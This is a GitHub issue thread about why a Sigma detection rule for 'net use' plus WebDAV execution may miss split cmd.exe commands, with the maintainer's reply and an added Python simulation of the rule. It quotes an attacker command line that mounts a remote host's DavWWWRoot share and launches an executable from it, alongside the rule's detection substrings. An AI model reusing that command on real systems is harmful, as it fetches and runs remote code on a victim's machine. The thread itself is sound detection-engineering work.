Issues found in proc_creation_win_cmd_net_use_and_exec_combo.yml #5141

Closed

DanielKoifman opened this issue Dec 24, 2024 · 2 comments
DanielKoifman commented Dec 24, 2024

Hi team, I have a question/finding regarding https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_cmd_net_use_and_exec_combo.yml

The rule relies on the CommandLine including ALL of the following:

  • ' net use http'
  • '& start /b '
  • '\DavWWWRoot'

The problem here is that because the commandLine in the associated reference source

"C:\Windows\System32\cmd.exe" /c net use http://164.92.205.182 && start /b \\164.92.205.182\DavWWWRoot\1C-Bitrix-0722.docx & start /b \\164.92.205.182\DavWWWRoot\lg.exe node.exe i

includes && and &, which, similarly to the pipe character, will split the command into separate event logs rather than a single one.

This can be easily simulated if I run the following command:

whoami && ipconfig & ping 8.8.8.8

Which will result in three different event logs:

[three screenshots of the resulting process creation events, one each for whoami, ipconfig and ping]

Additionally, using "start /b" in cmd does not get logged. For example, running "start /b myFile.exe" will result in "Process Command Line: myFile.exe".

This article also supports this finding:

[screenshot from the referenced article]

I wasn't sure what would be the best way to fix it, so I created an issue instead of a PR.
Thank you in advance!

github-actions bot (Contributor) commented
Welcome @DanielKoifman 👋

It looks like this is your first issue on the Sigma rules repository!

The following repository accepts issues related to false positives or 'rule ideas'.

If you're reporting an issue related to the pySigma library please consider submitting it here

If you're reporting an issue related to the deprecated sigmac library please consider submitting it here

Thanks for taking the time to open this issue, and welcome to the Sigma community! 😃

nasbench (Member) commented

Hi @DanielKoifman

As explained here, the rule is looking for a full command with quotes. We are aware of the effect of cmd.exe and how commands are treated. Hence this is a best-case detection. It can be bypassed by not using quotes, but for that we have other coverage.
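The two scenarios discussed in this thread, the original report (a `cmd.exe /c "..."` invocation carrying the whole command versus operators typed at an interactive prompt) and the maintainer's answer (the rule matches the single cmd.exe event that carries the full quoted command line, not the children it spawns), worked through as an added example. This code is not from the SigmaHQ repository or from either commenter. The process creation events are constructed to model Sysmon EID 1 / Security 4688 telemetry, the process IDs are made up, and `suspicious_parents` is a hypothetical parent-correlation check added for illustration, not the project's "other coverage":

```python
"""Why proc_creation_win_cmd_net_use_and_exec_combo.yml only fires on the
cmd.exe event that carries the whole command, and never on the children
cmd.exe spawns after splitting on && and &.

All events below are constructed samples, not captured telemetry.
"""
from collections import defaultdict

# The rule's selection: CommandLine|contains|all of these three substrings.
# Sigma string matching is case-insensitive by default, so everything is
# compared in lower case.
RULE_CONTAINS_ALL = (" net use http", "& start /b ", "\\davwwwroot")


def matches_rule(event):
    """True when one event's CommandLine contains all three substrings."""
    cmdline = event.get("CommandLine", "").lower()
    return all(needle in cmdline for needle in RULE_CONTAINS_ALL)


def matching_pids(events):
    """ProcessIds of every event the Sigma selection would match."""
    return [e["ProcessId"] for e in events if matches_rule(e)]


# Scenario A (constructed): cmd.exe /c is started with the full command line
# from the reference sample (e.g. by a LNK file). cmd.exe then splits the
# line on && and & and spawns each part as its own process; "start /b" does
# not appear in the child's command line, as the report notes.
FULL_CMD = (r'"C:\Windows\System32\cmd.exe" /c net use http://164.92.205.182 '
            r'&& start /b \\164.92.205.182\DavWWWRoot\1C-Bitrix-0722.docx '
            r'& start /b \\164.92.205.182\DavWWWRoot\lg.exe node.exe i')
SCRIPTED = [
    {"ProcessId": 100, "ParentProcessId": 40,
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": FULL_CMD},
    {"ProcessId": 101, "ParentProcessId": 100,
     "Image": r"C:\Windows\System32\net.exe",
     "CommandLine": "net use http://164.92.205.182"},
    {"ProcessId": 102, "ParentProcessId": 100,
     "Image": r"\\164.92.205.182\DavWWWRoot\lg.exe",
     "CommandLine": r"\\164.92.205.182\DavWWWRoot\lg.exe node.exe i"},
]

# Scenario B (constructed): the reporter's test, typed at an interactive
# prompt. The shell's own event carries no payload, and each child is logged
# on its own, so no single event contains all three substrings.
INTERACTIVE = [
    {"ProcessId": 200, "ParentProcessId": 30,
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'"C:\Windows\system32\cmd.exe"'},
    {"ProcessId": 201, "ParentProcessId": 200,
     "Image": r"C:\Windows\System32\whoami.exe", "CommandLine": "whoami"},
    {"ProcessId": 202, "ParentProcessId": 200,
     "Image": r"C:\Windows\System32\ipconfig.exe", "CommandLine": "ipconfig"},
    {"ProcessId": 203, "ParentProcessId": 200,
     "Image": r"C:\Windows\System32\PING.EXE", "CommandLine": "ping 8.8.8.8"},
]


def suspicious_parents(events):
    """Hypothetical parent-correlation check (illustration only, not the
    Sigma rule): flag a parent whose children include a net.exe 'use http'
    and a process whose image lives under a \\DavWWWRoot\\ path, so the
    behaviour is caught even when the operators never reach one event."""
    children = defaultdict(list)
    for e in events:
        children[e["ParentProcessId"]].append(e)
    flagged = set()
    for parent, kids in children.items():
        has_net_use = any(k["Image"].lower().endswith("\\net.exe")
                          and "use http" in k["CommandLine"].lower()
                          for k in kids)
        has_dav_image = any("\\davwwwroot\\" in k["Image"].lower() for k in kids)
        if has_net_use and has_dav_image:
            flagged.add(parent)
    return flagged


if __name__ == "__main__":
    print("scripted   -> rule hits:", matching_pids(SCRIPTED),
          "correlated parents:", suspicious_parents(SCRIPTED))
    print("interactive-> rule hits:", matching_pids(INTERACTIVE),
          "correlated parents:", suspicious_parents(INTERACTIVE))
```

Run as-is: the rule fires exactly once in the scripted scenario, on the cmd.exe event (PID 100) whose command line still holds the unsplit `&& start /b` and `& start /b` tokens, and never on the net.exe or lg.exe children; in the interactive scenario it fires on nothing, which is the behaviour the report describes. The correlation function shows the kind of sibling-process logic that would be needed to cover the split case, and it pays for that with a dependency on parent/child fields that a plain process creation rule does not need.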
